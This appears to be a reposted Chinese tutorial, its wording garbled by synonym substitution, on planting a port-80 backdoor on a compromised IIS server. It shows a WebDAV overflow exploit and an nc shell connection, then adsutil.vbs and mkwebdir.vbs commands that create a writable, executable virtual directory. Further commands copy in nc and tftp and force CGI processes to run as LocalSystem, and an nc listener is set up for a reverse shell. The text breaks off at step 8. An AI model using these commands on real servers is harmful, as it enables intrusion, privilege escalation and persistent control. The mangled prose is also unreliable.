快捷搜索:

用AdminScripts下的vbs工具在80端口留后门

IIS是今朝对照盛行的www办事器,设置欠妥破绽就很多。入侵IIS办事器后留下后门,今后就可以随时节制。一样平常的后门法度榜样都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都因此一种类telnet的要领在办事器端监听远程的连接节制。不过一个对照警备缜密的www站点(他们的治理员吃了苦头后)一样平常经由过程防火墙对端口进行限定,这样除了治理员开的端口外,其他端口就不能连接了。然则80端口是弗成能关闭的(假如治理员没有吃错药)。那么我们可以经由过程在80端口留后门,来开启永世的后门。

当IIS启动CGI利用法度榜样时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该法度榜样的安然高低文就由启动该CGI的用户抉择。一样平常匿名用户都映射到IUSR_computername这个账号,当然可以由治理员改为其他的用户。或者由浏览器供给一个合法的用户。两者的用户的权限都是对照低,可能都属于guest组的成员。着实我们可以改动IIS开启CGI的要领,来前进权限。我们来看IIS主进程本身是运行在localsystem账号下的,以是我们就可以获得最高localsystem的权限。

1. 入侵IIS获得一个shell,比如:IIS WebDAV

overflow remote exploit

J:\tool>webdavx3.pl 10.16.69.55 80

J:\tool>nc -vv 10.16.69.55 2000

vitter [10.16.69.55] 2000 (?) open

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-1998 Microsoft Corp.

2. cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs

enum w3svc/1/root

Microsoft (R) Windows 脚本宿主版本 5.1 for Windows

版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.

KeyType : (STRING) "IIsWebVirtualDir"

AccessRead : (BOOLEAN) True

AccessWrite : (BOOLEAN) False

AccessExecute : (BOOLEAN) False

AccessScript : (BOOLEAN) True

AccessSource : (BOOLEAN) False

AccessNoRemoteRead : (BOOLEAN) False

AccessNoRemoteWrite : (BOOLEAN) False

AccessNoRemoteExecute : (BOOLEAN) False

AccessNoRemoteScript : (BOOLEAN) False

HttpErrors : (LIST) (32 Items)

"400,*,FILE,F:\WINNT\help\iisHelp\common\400.htm"

"401,1,FILE,F:\WINNT\help\iisHelp\common\401-1.htm"

"401,2,FILE,F:\WINNT\help\iisHelp\common\401-2.htm"

"401,3,FILE,F:\WINNT\help\iisHelp\common\401-3.htm"

"401,4,FILE,F:\WINNT\help\iisHelp\common\401-4.htm"

"401,5,FILE,F:\WINNT\help\iisHelp\common\401-5.htm"

"403,1,FILE,F:\WINNT\help\iisHelp\common\403-1.htm"

"403,2,FILE,F:\WINNT\help\iisHelp\common\403-2.htm"

"403,3,FILE,F:\WINNT\help\iisHelp\common\403-3.htm"

"403,4,FILE,F:\WINNT\help\iisHelp\common\403-4.htm"

"403,5,FILE,F:\WINNT\help\iisHelp\common\403-5.htm"

"403,6,FILE,F:\WINNT\help\iisHelp\common\403-6.htm"

"403,7,FILE,F:\WINNT\help\iisHelp\common\403-7.htm"

"403,8,FILE,F:\WINNT\help\iisHelp\common\403-8.htm"

"403,9,FILE,F:\WINNT\help\iisHelp\common\403-9.htm"

"403,10,FILE,F:\WINNT\help\iisHelp\common\403-10.htm"

"403,11,FILE,F:\WINNT\help\iisHelp\common\403-11.htm"

"403,12,FILE,F:\WINNT\help\iisHelp\common\403-12.htm"

"403,13,FILE,F:\WINNT\help\iisHelp\common\403-13.htm"

"403,15,FILE,F:\WINNT\help\iisHelp\common\403-15.htm"

"403,16,FILE,F:\WINNT\help\iisHelp\common\403-16.htm"

"403,17,FILE,F:\WINNT\help\iisHelp\common\403-17.htm"

"404,*,FILE,F:\WINNT\help\iisHelp\common\404b.htm"

"405,*,FILE,F:\WINNT\help\iisHelp\common\405.htm"

"406,*,FILE,F:\WINNT\help\iisHelp\common\406.htm"

"407,*,FILE,F:\WINNT\help\iisHelp\common\407.htm"

"412,*,FILE,F:\WINNT\help\iisHelp\common\412.htm"

"414,*,FILE,F:\WINNT\help\iisHelp\common\414.htm"

"500,12,FILE,F:\WINNT\help\iisHelp\common\500-12.htm"

"500,13,FILE,F:\WINNT\help\iisHelp\common\500-13.htm"

"500,15,FILE,F:\WINNT\help\iisHelp\common\500-15.htm"

"500,100,URL,/iisHelp/common/500-100.asp"

DefaultDoc : (STRING) "default.html,Default.asp,index.php,i

ndex.asp,index.htm"

Path : (STRING) "C:\Inetpub\wwwroot"

AccessFlags : (INTEGER) 513

ScriptMaps : (LIST) (13 Items)

".asp,F:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"

".cer,F:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"

".cdx,F:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"

".asa,F:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"

".htr,F:\WINNT\System32\inetsrv\404.dll,1,GET,POST"

".idc,F:\WINNT\System32\inetsrv\404.dll,1,OPTIONS,GET,HEAD,POST,PUT,DELETE,TRA

CE"

".shtm,F:\WINNT\System32\inetsrv\404.dll,1,GET,POST"

".shtml,F:\WINNT\System32\inetsrv\404.dll,1,GET,POST"

".stm,F:\WINNT\System32\inetsrv\404.dll,1,GET,POST"

".php,D:\php\php-4.2.2-Win32\php.exe,1"

".php3,D:\php\php-4.2.2-Win32\php.exe,1"

".cgi,D:\USR\BIN\perl.exe %s %s,1"

".pl,D:\USR\BIN\perl.exe %s %s,1"

[/w3svc/1/root/localstart.asp]

[/w3svc/1/root/bbs]

[/w3svc/1/root/count]

[/w3svc/1/root/download]

[/w3svc/1/root/file]

[/w3svc/1/root/liuyan]

[/w3svc/1/root/old]

[/w3svc/1/root/wsjc]

[/w3svc/1/root/guest]

[/w3svc/1/root/test]

[/w3svc/1/root/zdzxroot]

[/w3svc/1/root/wins]

[/w3svc/1/root/udbbbs]

[/w3svc/1/root/safe]

[/w3svc/1/root/novel]

得到一些基础信息,现在我们心里已经有底了!

3. mkdir c:\inetpub\wwwroot\dir

4. cscript.exe c:\Inetpub\AdminScripts\mkwebdir.vbs

-c 10.16.69.55 -w "默认 Web 站点" -v "VirtualDir","c:\inetpub\wwwroot\dir"

这样就建好了一个虚目录:VirtualDir 你可以用第2步的敕令看一下

5. 接下来要改变一下VirtualDir的属性为execute

cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/VirtualDir/accesswrite

"true" -s:"10.16.69.55"

cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/VirtualDir/accessexecute

"true" -s:"10.16.69.55"

现在你已经可以upload 内容到该目录,并且可以运行。你可以把cmd.exe net.exe nc.exe tftp.exe直接拷贝到虚拟目录的磁盘目录中,用tftp

upload东东到该目录。

6. 以下敕令经由过程改动iis metabase 来迫使iis以本身的安然情况来创建新的CGI

process

cscript c:\Inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/VirtualDir/createprocessasuser

false

7. 在本地用nc监听一个端口

J:\tool>nc -l -p 3000 -nvv

8. 在远程目标系统用nc发送回

您可能还会对下面的文章感兴趣: